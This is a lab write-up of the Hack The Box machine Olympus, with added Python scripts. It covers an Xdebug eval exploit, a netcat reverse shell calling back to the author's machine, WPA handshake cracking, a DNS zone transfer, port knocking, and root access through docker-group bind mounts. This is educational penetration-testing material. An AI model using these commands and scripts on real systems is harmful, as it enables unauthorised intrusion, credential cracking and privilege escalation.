Enumeration
I started off with a simple Nmap scan on the target.
nmap -sV -sS 10.10.10.83
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-13 04:11 AEST
Nmap scan report for 10.10.10.83
Host is up (0.33s latency).
Not shown: 997 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   filtered ssh
53/tcp   open     domain  (unknown banner: Bind)
80/tcp   open     http    Apache httpd
2222/tcp open     ssh     (protocol 2.0)
A quick glance at the open ports shows nothing too unusual, except maybe SSH listening on 2222 while port 22 itself reports filtered rather than closed. I navigated to the HTTP service and all it contained was a simple image.
I also decided to run a Nikto scan to see if there was something I was missing.
nikto -h 10.10.10.83
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.83
+ Target Hostname: 10.10.10.83
+ Target Port: 80
+ Start Time: 2018-05-13 05:59:46 (GMT10)
---------------------------------------------------------------------------
+ Server: Apache
+ Uncommon header 'xdebug' found, with contents: 2.5.5
Xdebug is a debugger and profiler for PHP, and the header shows it is loaded on the web server. The known attack against it is not a memory bug but a configuration issue: with xdebug.remote_connect_back enabled, the engine opens a DBGp debugging connection back to whichever client asked for a debug session, and that client can then ask it to evaluate arbitrary PHP. A quick Google search turned up a Metasploit module for the version found, but I was unable to get it working. I also found numerous versions of a standalone exploit for 'Xdebug 2.5.5', which did not work either. Both exploits returned a timeout error. I later found out that this was due to a connection issue: my location (Australia) was too far from the server hosting the Olympus machine, and that was the reason the exploit was failing. I loaded up an Ubuntu instance on DigitalOcean located in America and ran the script again.
python3 exp.py -t http://10.10.10.83/index.php -c 'shell_exec('id');'
[+] Recieve data: <?xml version="1.0" encoding="iso-8859-1"?>
<response xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" command="eval" transaction_id="1"><property type="string" size="54" encoding="base64"><![CDATA[dWlkPTMzKHd3dy1kYXRhKSBnaWQ9MzMod3d3LWRhdGEpIGdyb3Vwcz0zMyh3d3ctZGF0YSkK]]></property></response>
[+] Result: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Success! I quickly made a reverse shell back to my Kali Linux machine.
python3 exp.py -t http://10.10.10.83/index.php -c 'shell_exec("nc -e /bin/sh 10.10.14.2 9000");'
[+] Recieve data: <?xml version="1.0" encoding="iso-8859-1"?>
<response xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" command="eval" transaction_id="1"><property type="null"></property></response>
[-] No result...
My happiness died down quickly because I couldn't find a user flag in the usual locations. Instead, I discovered the following files:
-rw-r--r-- 1 zeus zeus 297711 Apr 8 00:58 airgeddon.sh
-rw-r--r-- 1 zeus zeus 3283 Apr 8 00:58 Dockerfile
============================================================
-rw-r--r-- 1 zeus zeus 297917 Apr 8 12:48 captured.cap
-rw-r--r-- 1 zeus zeus 57 Apr 8 17:30 papyrus.txt
Airgeddon is primarily used to audit wireless networks. We also found a Dockerfile, which made me think that we were inside a Docker container; that would also explain the second SSH port in the Nmap scan, with port 2222 on the host forwarded to a container's port 22.
Inside of the papyrus.txt file was:
cat papyrus.txt
Captured while flying. I'll banish him to Olympia - Zeus
I then retrieved the capture file and opened it in Wireshark. The only thing I could discover from the capture file was the network's SSID:
SSID=Too_cl0se_to_th3_Sun
After some research, I learned how to crack the WPA handshake in a capture file with aircrack-ng. I passed in rockyou and let it run for a couple of minutes.
aircrack-ng captured.cap -w /usr/share/wordlists/rockyou.txt
Aircrack-ng 1.2 rc4
[00:37:19] 5306024/9822768 keys tested (2661.01 k/s)
Time left: 28 minutes, 17 seconds 54.02%
KEY FOUND! [ flightoficarus ]
Master Key : FA C9 FB 75 B7 7E DC 86 CC C0 D5 38 88 75 B8 5A
88 3B 75 31 D9 C3 23 C8 68 3C DB FA 0F 67 3F 48
Transient Key : 46 7D FD D8 1A E5 1A 98 50 C8 DD 13 26 E7 32 7C
DE E7 77 4E 83 03 D9 24 74 81 30 84 AD AD F8 10
21 62 1F 60 15 02 0C 5C 1C 84 60 FA 34 DE C0 4F
35 F6 4F 03 A2 0F 8F 6F 5E 20 05 27 E1 73 E0 73
EAPOL HMAC : AC 1A 73 84 FB BF 75 9C 86 CF 5B 5A F4 8A 4C 38
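What aircrack-ng is actually computing for each word of rockyou, as an added example that is not aircrack-ng's code: the PMK from the passphrase and SSID, then the PTK and the EAPOL MIC that are compared against the capture. The known-answer vector for "password"/"IEEE" comes from IEEE 802.11i Annex H; the SSID and Master Key constants are the ones printed above, and the four-word list standing in for rockyou.txt is constructed. The `crack`, `prf`, `ptk` and `eapol_mic` names are mine.

```python
"""What aircrack-ng computes for a WPA/WPA2-PSK handshake (added example).

aircrack-ng's "Master Key" is the PMK, "Transient Key" is the PTK and
"EAPOL HMAC" is the MIC. For each candidate passphrase: PMK = PBKDF2 over the
SSID; PTK = PRF-512 over the two MAC addresses and nonces of the 4-way
handshake; the MIC over the EAPOL frame is then compared with the captured one.
"""
import hashlib
import hmac


def pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """IEEE 802.11 PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def ptk(pmk_bytes, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs then nonces)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk_bytes, b"Pairwise key expansion", data, 64)


def eapol_mic(kck, eapol_frame, wpa2=True):
    """MIC over the EAPOL-Key frame with its 16-byte MIC field (offset 81) zeroed.
    WPA2/CCMP: HMAC-SHA1 truncated to 16 bytes; WPA/TKIP: HMAC-MD5."""
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    digest = hashlib.sha1 if wpa2 else hashlib.md5
    return hmac.new(kck, zeroed, digest).digest()[:16]


def crack(candidates, ssid, target_pmk=None, handshake=None):
    """Return the first candidate whose PMK matches target_pmk, or whose derived
    MIC matches handshake["mic"] (handshake keys: ap, sta, anonce, snonce, eapol, mic)."""
    for cand in candidates:
        k = pmk(cand, ssid)
        if target_pmk is not None and hmac.compare_digest(k, target_pmk):
            return cand
        if handshake is not None:
            kck = ptk(k, handshake["ap"], handshake["sta"],
                      handshake["anonce"], handshake["snonce"])[:16]
            if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), handshake["mic"]):
                return cand
    return None


# Known-answer vector from IEEE 802.11i Annex H: passphrase "password", SSID "IEEE".
IEEE_PMK = bytes.fromhex("f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")

# Values from the aircrack-ng run above: the SSID and the Master Key it printed.
PAGE_SSID = "Too_cl0se_to_th3_Sun"
PAGE_MASTER_KEY = bytes.fromhex(
    "FAC9FB75B77EDC86CCC0D5388875B85A883B7531D9C323C8683CDBFA0F673F48")

if __name__ == "__main__":
    # A constructed four-word list standing in for rockyou.txt.
    print(crack(["password", "olympus", "icarus", "flightoficarus"], PAGE_SSID,
                target_pmk=PAGE_MASTER_KEY))
```

Two things follow from the derivation. The SSID is the PBKDF2 salt, so a PMK table computed for one network name is useless against another, and the 4096-iteration PBKDF2 is the whole cost of each guess, which is why the run above was managing a few thousand keys per second on a CPU. The capture also has to contain a usable 4-way handshake (the nonces and the MIC-bearing EAPOL frame); a beacon alone only gives you the SSID.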
I then tried to SSH into both ports 22 and 2222 using the credentials discovered, but was again disappointed because it did not work. I tried roughly 30 different password combinations based on Greek mythology, all of which failed to grant me access. Almost defeated, I tried one last combination...
ssh [email protected] -p 2222
I then tried using the SSID as the password... and IT WORKED. I navigated to the user's home directory as soon as possible and was once again disappointed, and maybe slightly devastated, to find that there was NO user flag; in its place I found:
-rw-r--r-- 1 root root 85 Apr 15 21:50 help_of_the_gods.txt
...
cat help_of_the_gods.txt
Athena goddess will guide you through the dark...
Way to Rhodes...
ctfolympus.htb
I ran my usual enumeration on the machine and wasn't able to find anything interesting. I re-read the message, and the name ctfolympus.htb reminded me of something I did on another box, Aragog, where I had to add the hostname to my hosts file to route my traffic to a WordPress blog.
root@kali:~/Desktop/HackTheBox# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.83 ctfolympus.htb # added
I quickly added this to my hosts file and tried to browse to the page, but was greeted by the same web page with the single image (not sure why I was expecting anything else...). After an hour of googling and reading other CTF writeups, I decided to try a DNS zone transfer against the BIND server on port 53.
root@kali:~/Desktop/HackTheBox# dig -t AXFR ctfolympus.htb @10.10.10.83
; <<>> DiG 9.11.3-1-Debian <<>> -t AXFR ctfolympus.htb @10.10.10.83
;; global options: +cmd
ctfolympus.htb. 86400 IN SOA ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
ctfolympus.htb. 86400 IN TXT "prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"
ctfolympus.htb. 86400 IN A 192.168.0.120
ctfolympus.htb. 86400 IN NS ns1.ctfolympus.htb.
ctfolympus.htb. 86400 IN NS ns2.ctfolympus.htb.
ctfolympus.htb. 86400 IN MX 10 mail.ctfolympus.htb.
crete.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
hades.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
mail.ctfolympus.htb. 86400 IN A 192.168.0.120
ns1.ctfolympus.htb. 86400 IN A 192.168.0.120
ns2.ctfolympus.htb. 86400 IN A 192.168.0.120
rhodes.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
RhodesColossus.ctfolympus.htb. 86400 IN TXT "Here lies the great Colossus of Rhodes"
www.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
ctfolympus.htb. 86400 IN SOA ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
;; Query time: 231 msec
;; SERVER: 10.10.10.83#53(10.10.10.83)
;; WHEN: Sun May 25 19:00:00 AEST 2018
;; XFR size: 15 records (messages 1, bytes 475)
The only line of interest was the TXT record below, which got all of my attention.
ctfolympus.htb. 86400 IN TXT "prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"
After another few hours of struggling and googling ways of temporarily exposing SSH, I came across the article How to Use Port Knocking to Hide Your SSH. The article matched the TXT record from the zone transfer nicely, and I interpreted it as: knock on ports 3456, 8234 and 62431 in that order to temporarily open SSH, then log in with "St34l_th3_F1re!". If you remember, port 22 showed as filtered in the Nmap scan, which is exactly what a knock daemon guarding sshd looks like from the outside, so I was very eager to attempt it.
root@kali:~/Desktop/HackTheBox# knock -v 10.10.10.83 3456 8234 62431
hitting tcp 10.10.10.83:3456
hitting tcp 10.10.10.83:8234
hitting tcp 10.10.10.83:62431
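The same two steps, pulling the sequence out of the zone transfer and then knocking, as an added example that is not the `knock` client's code: it parses the TXT records from saved `dig -t AXFR` output, sends one TCP SYN per port in order, and immediately re-checks 22/tcp. The zone lines are copied from the output above; the knock delay, the 1-second per-port timeout and the helper names are mine, and the knock is ordinary TCP connects rather than raw packets, which is what knockd's default TCP SYN sequence needs.

```python
"""From a zone-transfer hint to a port knock (added example).

knockd watches for TCP SYNs to a fixed sequence of ports, from one source
address, within a short window. Once it sees the whole sequence it runs a
command, typically an iptables rule that opens 22/tcp for that address for a
few seconds, which is why port 22 shows as filtered to a plain port scan.
"""
import re
import socket
import sys
import time

# Records copied from the dig AXFR output above (other records omitted).
SAMPLE_ZONE = """\
ctfolympus.htb. 86400 IN SOA ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
ctfolympus.htb. 86400 IN TXT "prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"
ctfolympus.htb. 86400 IN A 192.168.0.120
hades.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
RhodesColossus.ctfolympus.htb. 86400 IN TXT "Here lies the great Colossus of Rhodes"
"""


def txt_records(zone_text):
    """Return the quoted payload of every TXT record in `dig -t AXFR` output."""
    found = []
    for line in zone_text.splitlines():
        fields = line.split(None, 4)          # name ttl class type rdata
        if len(fields) == 5 and fields[3] == "TXT":
            found.append(fields[4].strip().strip('"'))
    return found


def parse_knock_hint(txt):
    """Interpret 'user, ... (p1 p2 p3) and <password>' as (user, ports, password).
    Returns None when the record does not look like a knock hint."""
    m = re.search(r"\(([\d\s]+)\)\s+and\s+(\S+)", txt)
    if not m:
        return None
    user = re.match(r"(\w+),", txt)
    ports = [int(p) for p in m.group(1).split()]
    return (user.group(1) if user else None), ports, m.group(2)


def find_knock_hint(zone_text):
    """First TXT record that parses as a knock hint, else None."""
    for txt in txt_records(zone_text):
        hint = parse_knock_hint(txt)
        if hint:
            return hint
    return None


def knock(host, ports, delay=0.3, timeout=1.0):
    """Send one TCP SYN per port, in order. The ports are closed, so every
    connect is expected to be refused or time out; knockd only needs the SYN."""
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
            except OSError:
                pass
        time.sleep(delay)


def tcp_open(host, port, timeout=3.0):
    """True if a full TCP connect to host:port succeeds."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


def main(host, zone_text):
    hint = find_knock_hint(zone_text)
    if hint is None:
        sys.exit("no knock sequence found in the zone data")
    user, ports, password = hint
    print("22/tcp open before knock:", tcp_open(host, 22))
    knock(host, ports)
    opened = tcp_open(host, 22)       # check straight away; the open window is short
    print("22/tcp open after knock: ", opened)
    if opened:
        print(f"ssh {user}@{host}   # password: {password}")


if __name__ == "__main__":
    # python3 knock.py 10.10.10.83 < zone.txt   (zone.txt = saved dig AXFR output)
    zone = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_ZONE
    main(sys.argv[1], zone)
```

Knockd keys the sequence on the source address, so the knocks and the SSH connection must come from the same IP, and its sequence and open windows are both only seconds long; knocking from a laptop and connecting from a VPS, or pausing between the knock and the login, fails silently.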
root@kali:~/Desktop/HackTheBox# ssh prometheus@10.10.10.83
The authenticity of host '10.10.10.83 (10.10.10.83)' can't be established.
ECDSA key fingerprint is SHA256:8TR2+AWSBT/c5mrjpDotoEYu0mEy/jCzpuS79d+Z0oY.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.83' (ECDSA) to the list of known hosts.
prometheus@10.10.10.83's password: St34l_th3_F1re!
Welcome to
) (
( /( ) )\ ) (
)\()) ( /( (()/( ))\ (
((_)\ )(_)) ((_))/((_))\
| |(_)((_)_ _| |(_)) ((_)
| ' \ / _` |/ _` |/ -_)(_-<
|_||_|\__,_|\__,_|\___|/__/
prometheus@olympus:~$ ls
msg_of_gods.txt user.txt
prometheus@olympus:~$ cat msg_of_gods.txt
Only if you serve well to the gods, you'll be able to enter into the
_
___ | | _ _ ._ _ _ ___ _ _ ___
/ . \| || | || ' ' || . \| | |<_-<
\___/|_|`_. ||_|_|_|| _/`___|/__/
<___' |_|
prometheus@olympus:~$ cat user.txt
8a============================19
Privilege Escalation
Once again, I ran my usual enumeration methodology and found one interesting piece of information.
prometheus@olympus:~$ groups
prometheus cdrom floppy audio dip video plugdev netdev bluetooth docker
I did not have privileged access, BUT I was a member of the docker group, which lets me run Docker commands against a daemon that itself runs as root.
prometheus@olympus:~$ docker container ls
CONTAINER ID   IMAGE     COMMAND                  CREATED        STATUS          PORTS                                    NAMES
f00ba96171c5   crete     "docker-php-entrypoi…"   2 months ago   Up 15 minutes   0.0.0.0:80->80/tcp                       crete
ce2ecb56a96e   rodhes    "/etc/bind/entrypoin…"   2 months ago   Up 15 minutes   0.0.0.0:53->53/tcp, 0.0.0.0:53->53/udp   rhodes
620b296204a3   olympia   "/usr/sbin/sshd -D"      2 months ago   Up 15 minutes   0.0.0.0:2222->22/tcp                     olympia
Interesting. Using the hint from the msg_of_gods.txt file, I tried to access the olympia container to get the flag, but was unable to get root on the machine. I then had the idea of using my Docker privileges to start a second container from the same image, bind-mount the host's /root directory into it, and read the files that way.
prometheus@olympus:~$ docker run -v /root:/tmp/ olympia &
[1] 2452
prometheus@olympus:~$ docker container ls
CONTAINER ID   IMAGE     COMMAND                  CREATED          STATUS          PORTS                                    NAMES
97fccbdf5622   olympia   "/usr/sbin/sshd -D"      34 seconds ago   Up 33 seconds                                            reverent_pare
f00ba96171c5   crete     "docker-php-entrypoi…"   2 months ago     Up 12 minutes   0.0.0.0:80->80/tcp                       crete
ce2ecb56a96e   rodhes    "/etc/bind/entrypoin…"   2 months ago     Up 12 minutes   0.0.0.0:53->53/tcp, 0.0.0.0:53->53/udp   rhodes
620b296204a3   olympia   "/usr/sbin/sshd -D"      2 months ago     Up 12 minutes   0.0.0.0:2222->22/tcp                     olympia
prometheus@olympus:~$ docker exec --privileged -it 97fccbdf5622 ls -la /tmp
total 28
drwx------ 4 root root 4096 Apr 15 13:55 .
drwxr-xr-x 1 root root 4096 Jun 26 11:10 ..
-rw------- 1 root root 0 Apr 15 14:20 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwx------ 2 root root 4096 Apr 2 20:49 .cache
drwxr-xr-x 2 root root 4096 Apr 15 13:55 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-r-------- 1 root root 33 Apr 4 21:00 root.txt
All that was left to do was read the root flag!
(Some time has passed since I worked on this machine; I have since had the privilege of working with Docker, and I now realise it would have been easier to just open a shell in the container.)
prometheus@olympus:~$ docker exec --privileged -it 97fccbdf5622 cat /tmp/root.txt
ab============================03
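The same escalation tidied up, as an added example that is not the page's commands: it parses `docker container ls` to show which host ports belong to which container (which is what the odd port 2222 in the Nmap scan was), then reads a host file through a throwaway container with the host root bind-mounted. It assumes the `olympia` image has /bin/cat and /usr/sbin/chroot, and that `docker` is on the path; the sample listing is the one above with its column spacing restored, and the helper names are mine. The page's own approach (a second sshd container with /root mounted, then `docker exec`) relies on exactly the same property of the daemon; overriding the entrypoint just avoids starting sshd.

```python
"""What docker-group membership gives you on the host (added example).

The daemon runs as root and bind-mounts whatever host path a client asks for,
so anyone who can reach its socket can read or write every file on the host;
the docker group is root-equivalent, no setuid or sudo misconfiguration needed.
"""
import re
import shutil
import subprocess

# The `docker container ls` output shown above, with the column spacing restored.
SAMPLE_CONTAINER_LS = """\
CONTAINER ID   IMAGE     COMMAND                  CREATED        STATUS          PORTS                                    NAMES
f00ba96171c5   crete     "docker-php-entrypoi…"   2 months ago   Up 15 minutes   0.0.0.0:80->80/tcp                       crete
ce2ecb56a96e   rodhes    "/etc/bind/entrypoin…"   2 months ago   Up 15 minutes   0.0.0.0:53->53/tcp, 0.0.0.0:53->53/udp   rhodes
620b296204a3   olympia   "/usr/sbin/sshd -D"      2 months ago   Up 15 minutes   0.0.0.0:2222->22/tcp                     olympia
"""

PORT_RE = re.compile(r"(\d+)->(\d+)/(tcp|udp)")


def in_docker_group(groups_line):
    """True when the output of `groups` / `id -Gn` lists docker."""
    return "docker" in groups_line.split()


def published_ports(ls_output):
    """Map (host port, proto) -> (container name, container port).
    `docker container ls` separates its columns with two or more spaces."""
    mapping = {}
    for line in ls_output.splitlines()[1:]:          # skip the header row
        cols = re.split(r"\s{2,}", line.strip())
        if len(cols) < 6:
            continue
        name = cols[-1]
        ports = cols[5] if len(cols) >= 7 else ""     # PORTS column may be empty
        for host_port, cont_port, proto in PORT_RE.findall(ports):
            mapping[(int(host_port), proto)] = (name, int(cont_port))
    return mapping


def read_host_file_cmd(image, host_path):
    """argv that prints one host file via a throwaway container. Assumes the
    image has /bin/cat; --entrypoint stops the image's own service starting."""
    return ["docker", "run", "--rm", "-v", "/:/host",
            "--entrypoint", "/bin/cat", image, "/host" + host_path]


def host_root_shell_cmd(image):
    """argv for an interactive root shell on the host filesystem, assuming the
    image ships /usr/sbin/chroot."""
    return ["docker", "run", "--rm", "-it", "-v", "/:/host",
            "--entrypoint", "/usr/sbin/chroot", image, "/host", "/bin/bash"]


def run(argv):
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    groups = run(["id", "-Gn"]).strip()
    print("docker group:", in_docker_group(groups))
    if shutil.which("docker") and in_docker_group(groups):
        for (hport, proto), (name, cport) in sorted(
                published_ports(run(["docker", "container", "ls"])).items()):
            print(f"host {hport}/{proto} -> {name}:{cport}")
        print(run(read_host_file_cmd("olympia", "/root/root.txt")))
```

The defensive reading is the same as the offensive one: putting a user in the docker group is granting root, so it belongs in the same review as sudoers, and on a host where that is unacceptable the daemon should be run rootless or access to its socket restricted instead.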
Overall, this was a really challenging box, but I learned a lot from it: about Docker containers and how they work, as well as niche techniques such as port knocking and analysing and cracking capture files.